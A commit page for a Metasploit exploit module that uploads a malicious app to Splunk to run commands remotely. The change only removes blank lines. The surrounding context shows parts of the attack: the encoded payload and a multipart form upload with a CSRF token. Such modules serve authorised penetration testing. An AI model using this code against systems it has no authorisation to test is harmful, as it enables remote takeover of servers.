Update splunk_upload_app_exec.rb

2019-03-19 14:42:56 +01:00 · 2019-03-19 14:42:56 +01:00 · 98a7938837
parent aff77e58bf
commit 98a7938837
1 changed files with 6 additions and 10 deletions
--- a/modules/exploits/multi/http/splunk_upload_app_exec.rb
+++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb
@ -125,7 +125,6 @@ class MetasploitModule < Msf::Exploit::Remote
    @splunkweb_csrf_token_8000_id = ''
    @csrf_form_port = "splunkweb_csrf_token_#{rport}" # Default to using rport, corrected during tokenization for v6 below.
    @ver7 = false # splunk version 7 boolean
-
    app_name = 'upload_app_exec'
    p = payload.encoded
    print_status("Using command: #{p}")
@ -397,17 +396,14 @@ class MetasploitModule < Msf::Exploit::Remote
    data =  "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"state\"\r\n"
    data << "\r\n#{@state_token}\r\n"
-
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"splunk_form_key\"\r\n"
    data << "\r\n#{@splunkweb_csrf_token_8000_id}\r\n"
-    
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{archive_file_name}\"\r\n"
    data << "Content-Type: application/x-compressed-tar\r\n\r\n"
    data << file_data
    data << "\r\n--#{boundary}\r\n"
-
    data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n"
    data << "1"
    data << "\r\n--#{boundary}--\r\n"